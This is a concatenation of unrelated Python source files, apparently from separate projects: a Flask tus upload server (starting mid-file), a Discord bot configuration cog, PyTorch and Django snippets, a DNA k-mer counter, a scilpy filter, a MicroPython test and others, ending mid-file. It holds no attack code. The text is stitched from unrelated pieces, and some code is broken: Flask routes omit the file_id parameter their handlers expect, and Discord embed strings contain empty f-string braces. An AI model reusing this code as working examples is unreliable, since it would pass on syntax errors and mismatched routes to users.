request.headers.get('Upload-Length'), 'tus_resumable': request.headers.get('Tus-Resumable'), 'upload_metadata': metadata2dict(request.headers.get('Upload-Metadata')), 'id': str(uuid.uuid4()) # 任意のファイルID生成 } if data['upload_metadata']['fileext'] != '': # 拡張子がある場合は付与する data['id'] += '.' + data['upload_metadata']['fileext'] res = make_response('', 201) res.headers['Location'] = '/api/files/' + data['id'] res.headers['Tus-Resumable'] = data['tus_resumable'] #res.headers['Access-Control-Allow-Origin'] = request.environ['HTTP_ORIGIN'] #res.headers['Access-Control-Allow-Headers'] = 'access-control-allow-origin,content-type' res.headers['Access-Control-Expose-Headers'] = 'Upload-Offset, Location, Upload-Length, Tus-Version, Tus-Resumable, Tus-Max-Size, Tus-Extension, Upload-Metadata' files[data['id']] = int(data['upload_length']) # アップロード予定サイズを保持 return res # resume file upload @app.route('/api/files/', methods=['PATCH']) def resume(file_id): data = { 'content_type': request.headers.get('Content-Type'), 'content_length': request.headers.get('Content-Length'), # 残りアップロードサイズ 'upload_offset': request.headers.get('Upload-Offset'), # アップロード済みサイズ 'tus_resumable': request.headers.get('Tus-Resumable') } # ファイル保存 saved_size = save_file(file_id, request.get_data()) # response res = make_response('', 204) res.headers['Upload-Expires'] = datetime.now() + timedelta(hours=1) # レジューム不可になる期限=1時間後 res.headers['Upload-Offset'] = 0 if saved_size == False else saved_size # アップロード済みサイズ res.headers['Tus-Resumable'] = data['tus_resumable'] #res.headers['Access-Control-Allow-Origin'] = request.environ['HTTP_ORIGIN'] #res.headers['Access-Control-Allow-Headers'] = 'access-control-allow-origin,content-type' res.headers['Access-Control-Expose-Headers'] = 'Upload-Offset, Location, Upload-Length, Tus-Version, Tus-Resumable, Tus-Max-Size, Tus-Extension, Upload-Metadata' return res # confirm uploaded file @app.route('/api/files/', methods=['HEAD']) def confirm(file_id): # response saved_size = get_saved_file_size(file_id) # アップロード済みサイズ res = make_response('', 404 if saved_size == False else 200) if isinstance(saved_size, int): res.headers['Upload-Offset'] = saved_size res.headers['Tus-Resumable'] = request.headers.get('Tus-Resumable') return res if __name__ == "__main__": # run server: http://localhost:3333 app.run(port=3333, debug=True, host="0.0.0.0") src/cogs/config.py import os import sys import time import psutil import aiohttp import discord import logging import humanize import datetime import coloredlogs from discord.utils import get from discord.ext import commands from collections import Counter from utils.GuildConfigManager import GuildConfigManager from utils.TimeConverter import TimeConverter async def webhook_send( url, message, username="Erin Logs", avatar="https://raw.githubusercontent.com/AakashSharma7269/erin/main/erin.png?token=", ): async with aiohttp.ClientSession() as session: webhook = discord.Webhook.from_url( url, adapter=discord.AsyncWebhookAdapter(session) ) if isinstance(message, discord.Embed): await webhook.send(embed=message, username=username, avatar_url=avatar) else: await webhook.send(message, username=username, avatar_url=avatar) log = logging.getLogger("Utility cog") coloredlogs.install(logger=log) allowed_ords = ( list(range(65, 91)) + list(range(97, 123)) + [32, 33, 35, 36, 37, 38, 42, 43, 45, 46, 47] + list(range(48, 65)) + list(range(90, 97)) ) class plural: def __init__(self, value): self.value = value def __format__(self, format_spec): if self.value == 1: return f"{self.value} {format_spec}" else: return f"{self.value} {format_spec}s" class Config(commands.Cog): """ Configuration commands for the server admins! """ def __init__(self, bot): self.bot = bot self.TimeConverter = TimeConverter() self.gcm = GuildConfigManager() @commands.Cog.listener() async def on_ready(self): log.warn(f"{self.__class__.__name__} Cog has been loaded") # on guild add , add a default prefix @commands.Cog.listener() async def on_guild_join(self, guild): await self.gcm.register_guild(guild) channelEmbed = discord.Embed( name="Erin added!", description=f"Erin was added to `{guild.name}`", color=11661816, ) channelEmbed.add_field(name="Guild ID:", value=guild.id, inline=False) channelEmbed.add_field(name="Guild owner id:", value=guild.owner.id, inline=False) channelEmbed.add_field(name="Guild owner:", value=f"<@{}> , {guild.owner}", inline=False) channelEmbed.set_thumbnail(url=guild.icon_url) channelEmbed.set_footer( text=guild.name, icon_url=guild.icon_url, ) channelEmbed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) await webhook_send( os.getenv("GUILDADDLOG"), message=channelEmbed, username="Erin join logs" ) # on guild remove, remove all the prefixes from the database @commands.Cog.listener() async def on_guild_remove(self, guild): await self.gcm.unregister_guild(guild) print("Erin removed!") channelEmbed = discord.Embed( name="Erin removed :c", description=f"Erin was removed from `{guild.name}`", color=11661816, ) channelEmbed.add_field(name="Guild ID:", value=guild.id, inline=False) channelEmbed.add_field(name="Guild owner id:", value=guild.owner.id, inline=False) channelEmbed.add_field(name="Guild owner:", value=f"<@{}> , {guild.owner}", inline=False) channelEmbed.set_thumbnail(url=guild.icon_url) channelEmbed.set_footer( text=guild.name, icon_url=guild.icon_url, ) channelEmbed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) await webhook_send( os.getenv("GUILDREMOVELOG"), message=channelEmbed, username="Erin leave logs" ) # prefix manager sub command @commands.group(name="prefix", aliases=["setprefix"], case_insensitive=True, description="Sets my prefix!") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def prefix(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "Please mention a proper argument such as `add`, `remove`, or `list`" ) @prefix.command() @commands.has_permissions(manage_guild=True) async def add(self, ctx, *, prefix: str = None): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) if not prefix: embed.title = "Current prefix list" prefixNames = "".join([f"`{prefix}`\n" for prefix in prefixes]) embed.description = prefixNames embed.set_thumbnail(url=ctx.message.author.avatar_url) return await ctx.message.reply( "Please mention a valid prefix to be set.", embed=embed ) for character in prefix: if ord(character) not in allowed_ords: return await ctx.message.reply( f"The character `{character}` in this prefix is not permitted" ) if len(prefixes) >= 3: return await ctx.message.reply( f"Unable to add `{prefix}` as a custom prefix. Guild has reached the max amount (3) of custom prefixes.\nRun `{ctx.prefix}prefix remove ` to free up a slot" ) if prefix in prefixes: return await ctx.message.reply(f"Prefix `{prefix}` already exists.") if len(prefix) > 2: return await ctx.message.reply("Please enter a valid 2 character prefix.") for item in prefixes: if prefix in item or item in prefix: return await ctx.message.reply( f"`{prefix}` is technically present in `{item}`. Remove `{item}` before proceeding to add `{prefix}`" ) added = await self.gcm.add_prefix(ctx.guild, prefix) if added: embed.title = "Prefix added" embed.description = f"`{prefix}` added to guild prefix list" else: embed.title = "Prefix not added" embed.description = f"`{prefix}` was alerady in the prefix list" return await ctx.message.reply(embed=embed) @prefix.command() @commands.has_permissions(manage_guild=True) async def remove(self, ctx, *, prefix: str = ""): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) if len(prefixes) < 2: return await ctx.message.reply( "Guild must have atleast 1 prefix, add another one before removing any." ) if len(prefix) == 0: return await ctx.message.reply("Please provide a valid prefix to remove.") if not (prefix in prefixes): return await ctx.message.reply( f"`{prefix}` is not a custom prefix in `{ctx.message.guild.name}`" ) removed = await self.gcm.remove_prefix(ctx.guild, prefix) if removed: embed.title = "Prefix removed" embed.description = f"`{prefix}` removed from guild prefix list" else: embed.title = "Prefix not removed" embed.description = f"`{prefix}` was already in the guild prefix list" return await ctx.message.reply(embed=embed) @prefix.command() @commands.cooldown(10, 120, commands.BucketType.guild) async def list(self, ctx): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) embed.title = "Current prefix list" prefixNames = "".join([f"`{prefix}`\n" for prefix in prefixes]) embed.description = prefixNames embed.set_thumbnail(url=ctx.message.author.avatar_url) return await ctx.message.reply(embed=embed) @commands.group(name="prefixes", aliases=["getprefix", "getprefixes"], case_insensitive=True, description="Gets my prefix!") @commands.cooldown(10, 120, commands.BucketType.guild) async def prefixes(self, ctx): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) embed.title = "Current prefix list" prefixNames = "".join([f"`{prefix}`\n" for prefix in prefixes]) embed.description = prefixNames embed.set_thumbnail(url=ctx.message.author.avatar_url) return await ctx.message.reply(embed=embed) @commands.group(name="muterole", case_insensitive=True, description="Sets up a `Muted` role!") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def muterole(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `add`, `remove` or `show`" ) @muterole.command(name="add") @commands.has_permissions(manage_guild=True) async def _add(self, ctx, muted_role: discord.Role): bot = ctx.guild.get_member(self.bot.user.id) # if the muted role is @everyone then throw badargument error if muted_role.id == ctx.guild.id: raise commands.errors.BadArgument( message='Role "@everyone" not found.') if muted_role.managed == True: raise commands.errors.BadArgument( message=f"{muted_role.mention} is managed by discord integration and cannot be added to anyone by me." ) if muted_role.position > bot.top_role.position: return await ctx.send( "I cannot assign the role to mute members as it is above my highest role." ) add = await self.gcm.add_muted_role(ctx.guild, muted_role.id) if add: return await ctx.message.reply(f"Mute role for `{ctx.guild.name}` updated.") @muterole.command(name="remove") @commands.has_permissions(manage_guild=True) async def _remove(self, ctx): try: await self.gcm.remove_muted_role(ctx.guild) except KeyError: return await ctx.message.reply( f"Muted role doesn't exist for `{ctx.guild.name}`" ) return await ctx.message.reply(f"Mute role for `{ctx.guild.name}` removed.") @muterole.command(name="show") async def _show(self, ctx): try: muted_role_id = await self.gcm.get_muted_role(ctx.guild) except KeyError: return await ctx.message.reply( f"No mute role has been setup for {ctx.guild.name}" ) muted_role = get(ctx.message.guild.roles, id=muted_role_id) embed = discord.Embed( title=f"{ctx.guild.name} - muted role is:", description=f"{muted_role.mention}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.group(name="muteduration", case_insensitive=True, description="Sets up a `Muted` role!") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def muteduration(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `set` or `show`" ) @muteduration.command(name="set") @commands.has_permissions(manage_guild=True) async def muteduration_set(self, ctx,mute_period:str=None): _mute_period = await self.TimeConverter.convert(ctx, mute_period) _mute_period_time = humanize.precisedelta(_mute_period) await self.gcm.set_default_mutetime(ctx.guild,_mute_period) embed = discord.Embed( title=f"{ctx.guild.name} - Default mute duration has been set to:", description=f"{_mute_period_time}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.send(embed=embed) @muteduration.command(name="show") async def muteduration_show(self, ctx): try: muteduration = await self.gcm.get_default_mutetime(ctx.guild) except KeyError: await self.gcm.set_default_mutetime(ctx.guild) return await ctx.message.reply( f"A default mute duration has not been setup for {ctx.guild.name}. Setting default mute duration to 1 hour." ) embed = discord.Embed( title=f"{ctx.guild.name} - Default mute duration is:", description=f"{humanize.precisedelta(muteduration)}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.group(name="banappeal", case_insensitive=True, description="Sets the ban appeal link") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def banappeal(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `add`, `remove` or `show`" ) @banappeal.command(name="add") @commands.has_permissions(manage_guild=True) async def __add(self, ctx, *, url: str): ban_appeal = await self.gcm.add_ban_appeal(ctx.guild, url) if ban_appeal: return await ctx.message.reply( f"Ban appeal link for `{ctx.guild.name}` updated." ) @banappeal.command(name="remove") @commands.has_permissions(manage_guild=True) async def __remove(self, ctx): try: await self.gcm.remove_ban_appeal(ctx.guild) except KeyError: return await ctx.message.reply( f"Ban appeal link doesn't exist for `{ctx.guild.name}`" ) return await ctx.message.reply( f"Ban appeal link for `{ctx.guild.name}` removed." ) @banappeal.command(name="show") async def __show(self, ctx): try: ban_appeal = await self.gcm.get_ban_appeal(ctx.guild) except KeyError: return await ctx.message.reply( f"No ban appeal link has been setup for {ctx.guild.name}" ) embed = discord.Embed( title=f"{ctx.guild.name} - Ban appeal link:", description=f"{ban_appeal}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.group(name="currencygen", case_insensitive=True, description="Sets the `drop/pick` channel") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def currencygen(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `add`, `remove` or `show`" ) @currencygen.command(name="add") @commands.has_permissions(manage_guild=True) async def ___add(self, ctx, *, channel: discord.TextChannel): currencyChannel = await self.gcm.update_currency_channel(ctx.guild, channel.id) if currencyChannel: return await ctx.message.reply( f"Currency generation channel for `{ctx.guild.name}` has been updated." ) @currencygen.command(name="remove") @commands.has_permissions(manage_guild=True) async def ___remove(self, ctx): try: await self.gcm.remove_currency_channel(ctx.guild) except KeyError: return await ctx.message.reply( f"Currency generation channel config doesn't exist for `{ctx.guild.name}`" ) return await ctx.message.reply( f"Currency generation channel for `{ctx.guild.name}` removed." ) @currencygen.command(name="show") async def ___show(self, ctx): try: currencyChannel = await self.gcm.get_currency_channel(ctx.guild) except KeyError: return await ctx.message.reply( f"No currency generation channel has been setup for {ctx.guild.name}" ) if not ctx.guild.get_channel(currencyChannel): return await ctx.message.reply( f"No currency generation channel has been setup for {ctx.guild.name}" ) embed = discord.Embed( title=f"{ctx.guild.name} - Currency generation channel:", description=f"{ctx.guild.get_channel(currencyChannel).mention}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.cooldown(1, 3, commands.BucketType.user) @commands.group(name="ping", description="Shows you my ping!") async def ping(self, ctx): time_now = time.time() msg = await ctx.message.reply( embed=discord.Embed(title="Pinging...", color=0x00FFFF) ) embed = discord.Embed( title="Pong! :ping_pong:", description=f"API Latency: **{round(self.bot.latency * 1000)}ms**\nBot Latency: **{round((time.time() - time_now) * 1000)}ms**", color=0x00FFFF, ) embed.set_footer( text=f"{ctx.message.author.display_name}#{ctx.message.author.discriminator}", icon_url=ctx.message.author.avatar_url, ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) await msg.edit(embed=embed) @commands.command(name="stats", aliases=["status"], description="View system stats") async def stats(self, ctx): mem = psutil.virtual_memory() disk = psutil.disk_usage("/") cpupercent = psutil.cpu_percent() async def round(n): if not n == 100: a = (n // 10) * 10 b = a + 10 return (b if n - a > b - n else a) else: return 100 async def make_bar(n): full = '█' empty = '░' bar = "" for i in range(1, (int(n/10)+1)): bar = bar+full for i in range(1, ((10-(int(n/10)))+1)): bar = bar+empty return bar membar = await round(int(mem.percent)) membar = await make_bar(membar) cpubar = await round(int(cpupercent)) cpubar = await make_bar(cpubar) diskbar = await round(int(disk.percent)) diskbar = await make_bar(diskbar) channel_types = Counter( isinstance(c, discord.TextChannel) for c in self.bot.get_all_channels() ) text = channel_types[True] em = discord.Embed(title="Bot Stats", color=discord.Color.blurple()) em.add_field( name="General info:", inline=False, value=f"Total Guilds: **{len(list(self.bot.guilds))}**\nTotal Users: **{len(list(self.bot.users))}**\nTotal Channels: **{text}**", ) em.add_field( name="Developers:", inline=False, value="<@633967275090771971> (Shinyzenith#6969 **Project Manager and Owner**)\n<@488688724948025357> (DankCoder#9983 **Project Manager, Front-end Developer, and Owner**)\n<@403657714812715008> (LinusDropTips#0404 **Developer**)\n<@747265562501185596> (thurm#1337 **Developer**)\n<@633764848924229635> (Ckyiu#9659 **Developer**)", ) em.add_field( name="Server info:", value=f"Discord.py Version: **{discord.__version__}**\nPython verion: **{sys.version}**\nVerion info: **{sys.version_info}**\n\nCPU: **{cpupercent}% used with {plural(psutil.cpu_count()):CPU} \n{cpubar}**\n\nMemory: **{humanize.naturalsize(mem.used)}/{humanize.naturalsize(mem.total)} \n{membar} ({mem.percent}% used)**\n\nDisk Space: **{humanize.naturalsize(disk.used)}/{humanize.naturalsize(disk.total)}\n{diskbar} ({disk.percent}% used)**", ) em.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url) em.set_thumbnail(url=ctx.message.author.avatar_url) em.set_footer(text=f"Requested by {ctx.author}") await ctx.send(embed=em) @commands.command(name="uptime", description="Check my uptime") async def uptime(self, ctx): delta = datetime.datetime.utcnow() - self.bot.startup_time await ctx.send(f"I started up {humanize.precisedelta(delta)} ago") @commands.command(name="invite", description="Get a invite link to add me to your server") async def invite(self, ctx): perms = discord.Permissions.all() em = discord.Embed(color=discord.Color.blurple()) em.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url) em.set_thumbnail(url=ctx.message.author.avatar_url) em.add_field( name="Invite Me!", inline=False, value=f"[Click Here](<{discord.utils.oauth_url(self.bot.user.id, permissions=perms)}>)", ) em.set_footer(text=f"{ctx.author}", icon_url=ctx.message.author.avatar_url) await ctx.send(embed=em) def setup(bot): bot.add_cog(Config(bot)) test_files/LEDtest.py import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BOARD) GPIO.setup(7,GPIO.OUT) for x in range(0,3): GPIO.output(7,True) time.sleep(1) GPIO.output(7,False) time.sleep(1) GPIO.cleanup() # -*- coding: utf-8 -*- from __future__ import unicode_literals, print_function, division from django.conf import settings from django.db import models from django.utils.translation import ugettext_lazy as _ from aldryn_forms.models import BaseFormPlugin def get_default_client_id(): return getattr(settings, 'DJANGOCMS_SALESFORCE_FORMS_CLIENT_ID', '') def get_default_external_key(): return getattr(settings, 'DJANGOCMS_SALESFORCE_FORMS_EXTERNAL_KEY', '') class SalesforceFormPlugin(BaseFormPlugin): client_id = models.CharField( verbose_name=_('Client ID'), max_length=255, help_text=_( 'Client ID to use for the submission ' '(_clientID field)' ), default=get_default_client_id, ) external_key = models.CharField( verbose_name=_('External Key'), max_length=255, help_text=_( 'DEManager External Key to use for the submission ' '(_deExternalKey field)' ), default=get_default_external_key, ) class Meta: abstract = False users/serializers.py0 from .models import CustomUser class UserSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = CustomUser fields = ['url', 'username', 'email', 'is_staff']import torch from pdb import set_trace as st import copy class PredAvgEnsemble(torch.nn.Module): def __init__(self, clients): super(PredAvgEnsemble, self).__init__() self.models = [copy.deepcopy(client.model_trainer.model) for client in clients] # self.models = [(client.model_trainer.model) for client in clients] # print(self.models[0].linear.weight.data_ptr() == self.models[1].linear.weight.data_ptr()) def update_clients(self, branches, clients): for model, w in zip(self.models, branches): model.load_state_dict(w) # for param1, param2 in zip(self.models[4].parameters(), self.models[8].parameters()): # print((param1==param2).all()) # st() # st() def forward(self, x): preds = [m(x) for m in self.models] preds = torch.stack(preds) preds = torch.mean(preds, axis=0) return preds def to(self, device): for model in self.models: model.to(device) def eval(self): for model in self.models: model.eval() toyota_na/vehicle/entity_types/ToyotaLockableOpening.py from .ToyotaOpening import ToyotaOpening class ToyotaLockableOpening(ToyotaOpening): _locked: bool def __init__(self, closed: bool = False, locked: bool = False): ToyotaOpening.__init__(self, closed) self._locked = locked @property def locked(self): return self._locked @locked.setter def locked(self, value): self._locked = value def __repr__(self) -> str: return ( f"{self.__class__.__name__}(closed={self._closed}, locked={self._locked})" ) import argparse import warnings from pytorch_lightning.models.trainer import Trainer from pytorch_lightning.callbacks import ModelCheckpoint from test_tube import Experiment import models warnings.filterwarnings('ignore') def main(): parser = argparse.ArgumentParser() parser.add_argument('--model', choices=['srcnn', 'srgan'], required=True) parser.add_argument('--scale_factor', type=int, default=4) parser.add_argument('--batch_size', type=int, default=16) parser.add_argument('--patch_size', type=int, default=96) parser.add_argument('--gpus', type=str, default='0') opt = parser.parse_args() # load model class if opt.model == 'srcnn': Model = models.SRCNNModel elif opt.model == 'srgan': Model = models.SRGANModel # add model specific arguments to original parser parser = Model.add_model_specific_args(parser) opt = parser.parse_args() # instantiate experiment exp = Experiment(save_dir=f'./logs/{opt.model}') exp.argparse(opt) model = Model(opt) # define callbacks checkpoint_callback = ModelCheckpoint( filepath=exp.get_media_path(exp.name, exp.version), ) # instantiate trainer trainer = Trainer( experiment=exp, max_nb_epochs=4000, add_log_row_interval=50, check_val_every_n_epoch=10, checkpoint_callback=checkpoint_callback, gpus=[int(i) for i in opt.gpus.split(',')] ) # start training! trainer.fit(model) if __name__ == "__main__": main() 0 text = 'GCACTTCTCGTAGGTGACCATTCGCACTTCTGCACTTCTAACAGCGCCAACAGCGCCCGTAGGTGGCACTTCTCGTAGGTGACCATTCACCATTCCGTAGGTGAACAGCGCCAACAGCGCCCGTAGGTGCGTAGGTGACCATTCACCATTCAACAGCGCCATAGCATCAACAGCGCCGCACTTCTACCATTCCGTAGGTGCGTAGGTGCGTAGGTGATAGCATCACCATTCCGTAGGTGATAGCATCCGTAGGTGAACAGCGCCACCATTCATAGCATCATAGCATCGCACTTCTCGTAGGTGGCACTTCTATAGCATCCGTAGGTGATAGCATCAACAGCGCCATAGCATCGCACTTCTCGTAGGTGGCACTTCTCGTAGGTGATAGCATCAACAGCGCCATAGCATCCGTAGGTGCGTAGGTGACCATTCAACAGCGCCACCATTCAACAGCGCCATAGCATCATAGCATCAACAGCGCCAACAGCGCCATAGCATCATAGCATCACCATTCATAGCATCGCACTTCTATAGCATCATAGCATCAACAGCGCCCGTAGGTGACCATTCATAGCATCGCACTTCTCGTAGGTGACCATTCCGTAGGTGCGTAGGTGGCACTTCTATAGCATCCGTAGGTGACCATTCACCATTCATAGCATCGCACTTCTACCATTCAACAGCGCCACCATTCATAGCATCCGTAGGTGATAGCATCATAGCATCCGTAGGTGCGTAGGTGCGTAGGTGCGTAGGTGCGTAGGTGCGTAGGTGAACAGCGCCATAGCATCGCACTTCTAACAGCGCCATAGCATCATAGCATC' k = 11 symbol_to_number = dict() symbol_to_number['A'] = 0 symbol_to_number['C'] = 1 symbol_to_number['G'] = 2 symbol_to_number['T'] = 3 number_to_symbol = ['A', 'C', 'G', 'T'] #index = 5871 #pattern = [] def number_to_pattern(index, k, pattern=None): if pattern is None: pattern = [] if k == 1: symbol = number_to_symbol[index] pattern.append(symbol) else: prefix_index = int(index) // 4 r = int(index) % 4 symbol = number_to_symbol[r] pattern.append(symbol) prefix_pattern = number_to_pattern(prefix_index, k - 1, pattern) patt = ''.join(pattern) patt = ''.join(reversed(patt)) #pattern.reverse() return patt def pattern_to_number(pattern): if len(pattern) == 0: return 0 symbol = pattern[-1] prefix = pattern[:-1] return 4 * pattern_to_number(prefix) + symbol_to_number[symbol] def computing_frequencies(text, k): frequency_array = [] for i in range(4**k): frequency_array.append(0) for i in range(len(text) - k + 1): pattern = text[i : i+k] j = pattern_to_number(pattern) frequency_array[j] = frequency_array[j] + 1 return frequency_array def faster_frequent_words(text, k): frequent_patterns = set() frequency_array = computing_frequencies(text, k) max_count = max(frequency_array) #print(max_count) for i in range(4**k): if frequency_array[i] == max_count: print(i) patterns = number_to_pattern(i, k) print(patterns) frequent_patterns.add(patterns) return frequent_patterns print(faster_frequent_words(text, k)) src/main.py from neochi.core.dataflow.data import clap_detector from neochi.core.dataflow.notifications import clap_detector as CD import sys import alsaaudio, time, audioop import threading import clapdetector as cld import redis def push_to_redis(redis_handler): clap_detected = CD.DetectedClap(redis_handler) clap_detected.notify() clap_detector = cld.ClapDetector("default:CARD=Device") r = redis.StrictRedis('redis', 6379, db=0) clap_detector.set_on_detect_func(push_to_redis, r) clap_detector.detect() import inspect import sys from functools import wraps from typing import Any, List, Optional, Union class hybridmethod: def __init__(self, func): self.func = func def __get__(self, obj, cls): @wraps(self.func) def hybrid(*args, **kwargs): return self.func(cls, obj, *args, **kwargs) hybrid.__func__ = hybrid.im_func = self.func hybrid.__self__ = hybrid.im_self = obj or cls return hybrid def _get_type_cons(type_): if sys.version_info.minor == 6: try: cons = type_.__extra__ except AttributeError: try: cons = type_.__origin__ except AttributeError: cons = type_ else: cons = type_ if cons is None else cons else: try: cons = type_.__origin__ if cons is None else cons except AttributeError: cons = type_ else: cons = type_.__origin__ return cons def _get_type_origin(type_): try: origin = type_.__origin__ except AttributeError: if sys.version_info.minor == 6: try: origin = type_.__extra__ except AttributeError: origin = type_ else: origin = type_ if origin is None else origin else: origin = type_ return origin def _hasargs(type_, *args): try: return all(arg in type_.__args__ for arg in args) except AttributeError: return False def _isinstance_safe(o, t): try: return isinstance(o, t) except Exception: return False def _issubclass_safe(cls, classinfo): try: return issubclass(cls, classinfo) except Exception: return _is_new_type(cls) and _is_new_type_subclass_safe(cls, classinfo) def _is_new_type_subclass_safe(cls, classinfo): super_type = getattr(cls, "__supertype__", None) if super_type: return _is_new_type_subclass_safe(super_type, classinfo) try: return issubclass(cls, classinfo) except Exception: return False def _is_new_type(type_): return inspect.isfunction(type_) and hasattr(type_, "__supertype__") def _is_optional(type_): return (_issubclass_safe(type_, Optional) or _hasargs(type_, type(None)) or type_ is Any) def _is_list(type_): return _issubclass_safe(type_, List) or _get_type_origin(type_) is list def _is_union(type_): return _get_type_origin(type_) is Union #!/usr/bin/env python # -*- coding: utf-8 -*- import argparse import logging from dipy.io.stateful_tractogram import Space, StatefulTractogram from dipy.io.streamline import save_tractogram import numpy as np from scilpy.tracking.tools import filter_streamlines_by_length from scilpy.io.streamlines import load_tractogram_with_reference from scilpy.io.utils import (assert_inputs_exist, assert_outputs_exist, add_overwrite_arg, add_reference_arg, add_verbose_arg) def _build_args_parser(): p = argparse.ArgumentParser( formatter_class=argparse.RawTextHelpFormatter, description='Filter streamlines by length.') p.add_argument('in_tractogram', help='Streamlines input file name.') p.add_argument('out_tractogram', help='Streamlines output file name.') p.add_argument('--minL', default=0., type=float, help='Minimum length of streamlines. [%(default)s]') p.add_argument('--maxL', default=np.inf, type=float, help='Maximum length of streamlines. [%(default)s]') p.add_argument('--no_empty', action='store_true', help='Do not write file if there is no streamline.') add_reference_arg(p) add_overwrite_arg(p) add_verbose_arg(p) return p def main(): parser = _build_args_parser() args = parser.parse_args() assert_inputs_exist(parser, args.in_tractogram) assert_outputs_exist(parser, args, args.out_tractogram) if args.verbose: logging.basicConfig(level=logging.DEBUG) sft = load_tractogram_with_reference(parser, args, args.in_tractogram) new_streamlines, new_per_point, new_per_streamline = filter_streamlines_by_length( sft, args.minL, args.maxL) new_sft = StatefulTractogram(new_streamlines, sft, Space.RASMM, data_per_streamline=new_per_streamline, data_per_point=new_per_point) if not new_streamlines: if args.no_empty: logging.debug("The file {} won't be written " "(0 streamline).".format(args.out_tractogram)) return logging.debug('The file {} contains 0 streamline'.format( args.out_tractogram)) save_tractogram(new_sft, args.out_tractogram) if __name__ == "__main__": main() scripts/sam_translate.py #!/usr/bin/env python # Based on https://github.com/awslabs/serverless-application-model/blob/master/bin/sam-translate.py import argparse import json import os import boto3 from samtranslator.public.translator import ManagedPolicyLoader from samtranslator.translator.transform import transform from samtranslator.yaml_helper import yaml_parse def parse_arguments(): parser = argparse.ArgumentParser() parser.add_argument('-i', '--input-file', help='Location of SAM tamplate to transform') parser.add_argument('-o', '--output-file', help='Location of resulting Cloudformation template (in JSON format)') args = parser.parse_args() cwd = os.getcwd() input_file_path = os.path.join(cwd, args.input_file) output_file_path = os.path.join(cwd, args.output_file) return input_file_path, output_file_path def main(): input_file_path, output_file_path = parse_arguments() with open(input_file_path) as f: sam_template = yaml_parse(f) iam = boto3.client('iam') cloudformation_template = transform(sam_template, {}, ManagedPolicyLoader(iam)) with open(output_file_path, 'w') as f: f.write(json.dumps(cloudformation_template, indent=2)) print(f'Wrote transformed Cloudformation template to {output_file_path}') if __name__ == '__main__': main() # basic tuple functionality x = (1, 2, 3 * 4) print(x) try: x[0] = 4 print("FAIL") raise SystemExit except TypeError: pass print(x) try: x.append(5) print("FAIL") raise SystemExit except AttributeError: pass print(x[1:]) print(x[:-1]) print(x[2:3]) print(x + (10, 100, 10000)) # inplace add operator x += (10, 11, 12) print(x) # construction of tuple from large iterator (tests implementation detail of uPy) print(tuple(range(20))) # unsupported unary operation try: +() print("FAIL") raise SystemExit except TypeError: pass # unsupported type on RHS of add try: () + None print("FAIL") raise SystemExit except TypeError: pass print("PASS")# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. from typing import TYPE_CHECKING from cdm.enums import CdmObjectType from cdm.enums.cdm_operation_type import OperationTypeConvertor, CdmOperationType from cdm.persistence.cdmfolder.types import OperationArrayExpansion from cdm.utilities.logging import logger from cdm.utilities.string_utils import StringUtils if TYPE_CHECKING: from cdm.objectmodel import CdmCorpusContext, CdmOperationArrayExpansion from cdm.utilities import ResolveOptions, CopyOptions _TAG = 'OperationArrayExpansionPersistence' class OperationArrayExpansionPersistence: """Operation ArrayExpansion persistence""" @staticmethod def from_data(ctx: 'CdmCorpusContext', data: 'OperationArrayExpansion') -> 'CdmOperationArrayExpansion': if not data: return None array_expansion_op = ctx.corpus.make_object(CdmObjectType.OPERATION_ARRAY_EXPANSION_DEF) if data.type and not StringUtils.equals_with_ignore_case(data.type, OperationTypeConvertor._operation_type_to_string(CdmOperationType.ARRAY_EXPANSION)): logger.error(_TAG, ctx, '$type {} is invalid for this operation.'.format(data.type)) else: array_expansion_op.type = CdmOperationType.ARRAY_EXPANSION 